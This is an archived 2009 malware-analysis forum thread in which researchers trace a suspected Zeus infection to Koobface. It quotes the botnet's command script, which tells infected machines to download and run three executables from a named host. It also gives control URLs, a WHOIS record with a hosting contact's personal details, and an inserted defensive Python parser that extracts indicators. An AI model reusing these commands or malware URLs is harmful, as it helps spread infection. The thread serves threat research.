Malware Domain List

Malware Related => Malware Analysis => Topic started by: cmg on July 08, 2009, 09:45:26 pm

Title: New Zeus?
Post by: cmg on July 08, 2009, 09:45:26 pm
 98.143.159.138:80 POST http://trisem.com/achcheck.php 
 98.143.159.138:80 POST http://trisem.com/ld/gen.php 

I can't get to ZeusTracker right now but I think this is another one.
Title: Re: New Zeus?
Post by: MysteryFCM on July 08, 2009, 10:12:34 pm
gen.php;

Code:
#noparam
#PID=6145
START|http://upload.octopus-multimedia.be/1/6244.exe
START|http://upload.octopus-multimedia.be/1/nfr.exe
STARTONCE|http://upload.octopus-multimedia.be/1/pp.10.exe
WAIT|60
#BLACKLABEL
EXIT

upload.octopus-multimedia.be = 87.236.216.149 <> byte.besite.be

http://hosts-file.net/?s=87.236.216.149

achcheck.php;

Code:
ACH_OK
Code:
inetnum: 87.236.216.0 - 87.236.216.255
netname: BESITE-NET1-BRU-BE
mnt-domains: BESITE-MNT
descr: besite256
country: BE
admin-c: TDW7-RIPE
tech-c: TDW7-RIPE
status: ASSIGNED PA
mnt-by: BESITE-MNT
source: RIPE # Filtered

person: Tom De Wispelaere
address: Fonteinstraat 1 a bus 5
address: B- 3000 Leuven
address: BE
phone: +003216270005
fax-no: +003216270001
e-mail: tom@besite.be
nic-hdl: TDW7-RIPE
source: RIPE # Filtered

% Information related to '87.236.216.0/24AS35746'

route: 87.236.216.0/24
descr: besite256r
origin: AS35746
mnt-by: BESITE-MNT
source: RIPE # Filtered
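The gen.php response quoted above is a command script: lines beginning with `#` carry metadata (`#PID=6145`, `#BLACKLABEL`), every other line is `VERB|ARGUMENT`, and the `START`/`STARTONCE` arguments are the download URLs worth blocking. The parser below is an added example, not code from the thread or from any project; it turns a captured response of this shape into a list of URLs and hostnames for a blocklist or proxy-log search. The grammar is inferred from this single sample, and the reading of `START`, `STARTONCE` and `WAIT` as "fetch and run", "fetch and run once" and "sleep N seconds" is an assumption based on the verb names.

```python
"""Extract indicators (download URLs, hosts) from a captured Koobface-style
command script.

Added example; not code from the thread. The VERB|ARGUMENT grammar and the
meaning of START / STARTONCE / WAIT are assumptions inferred from the one
sample posted."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

# The gen.php response quoted in the thread, embedded here as sample input.
SAMPLE_RESPONSE = """#noparam
#PID=6145
START|http://upload.octopus-multimedia.be/1/6244.exe
START|http://upload.octopus-multimedia.be/1/nfr.exe
STARTONCE|http://upload.octopus-multimedia.be/1/pp.10.exe
WAIT|60
#BLACKLABEL
EXIT
"""

Command = Tuple[str, Optional[object]]  # (verb, argument or None)


@dataclass
class CommandScript:
    metadata: Dict[str, str] = field(default_factory=dict)  # '#KEY=VALUE' / '#FLAG' lines
    commands: List[Command] = field(default_factory=list)   # parsed commands, in order
    errors: List[str] = field(default_factory=list)         # lines that failed validation


def parse_script(text: str) -> CommandScript:
    """Parse the script leniently: record bad lines in .errors instead of raising,
    so a slightly mangled capture still yields whatever indicators it contains."""
    script = CommandScript()
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            # '#PID=6145' -> {'PID': '6145'}; bare flags like '#BLACKLABEL' -> ''
            key, sep, value = line[1:].partition("=")
            script.metadata[key] = value if sep else ""
            continue
        verb, sep, arg = line.partition("|")
        verb = verb.upper()
        if verb in ("START", "STARTONCE"):
            parsed = urlparse(arg)
            if not sep or parsed.scheme not in ("http", "https") or not parsed.hostname:
                script.errors.append(f"line {lineno}: {verb} without a valid URL: {raw!r}")
                continue
            script.commands.append((verb, arg))
        elif verb == "WAIT":
            if not arg.isdigit():
                script.errors.append(f"line {lineno}: WAIT without a numeric delay: {raw!r}")
                continue
            script.commands.append((verb, int(arg)))
        elif verb == "EXIT" and not sep:
            script.commands.append((verb, None))
        else:
            script.errors.append(f"line {lineno}: unknown command: {raw!r}")
    return script


def download_urls(script: CommandScript) -> List[str]:
    """Every URL the script instructs the bot to fetch, in order of appearance."""
    return [arg for verb, arg in script.commands if verb in ("START", "STARTONCE")]


def indicator_hosts(script: CommandScript) -> List[str]:
    """Distinct hostnames from the download URLs, suitable for a DNS/proxy blocklist."""
    return sorted({urlparse(url).hostname for url in download_urls(script)})


if __name__ == "__main__":
    parsed = parse_script(SAMPLE_RESPONSE)
    print("metadata:", parsed.metadata)
    for url in download_urls(parsed):
        print("download:", url)
    print("block hosts:", indicator_hosts(parsed))
    for err in parsed.errors:
        print("parse error:", err)
```

Feeding the thread's gen.php response through `parse_script` yields the three payload URLs and a single host to block, `upload.octopus-multimedia.be`; malformed lines are reported rather than silently dropped, which matters when the capture came from a truncated proxy log.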
Title: Re: New Zeus?
Post by: MysteryFCM on July 08, 2009, 10:18:56 pm
/1/6244.exe = Win32/BHO.NOE trojan (NOD32)

http://www.virustotal.com/analisis/f59756971261414efae9df3ad8772b3d3ea51f399a94deaa3969f3c510b9ed68-1247091622

/1/nfr.exe = TrojanProxy:Win32/Koobface.Gen!C (Microsoft)

http://www.virustotal.com/analisis/c5e963fe982ec0956e6d74cc2f598db5b255bf7f2ed24bee49640894e7722aa0-1247091632

/1/pp.10.exe = Worm:Win32/Koobface.Gen!D (Microsoft)

http://www.virustotal.com/analisis/4698edb015333a382b6ea2944aabb031c5e2f445afeba8ed3f83df2749bcf469-1247091093
Title: Re: New Zeus?
Post by: philipp on July 08, 2009, 11:37:53 pm
The reply from gen.php says it's definitely Koobface.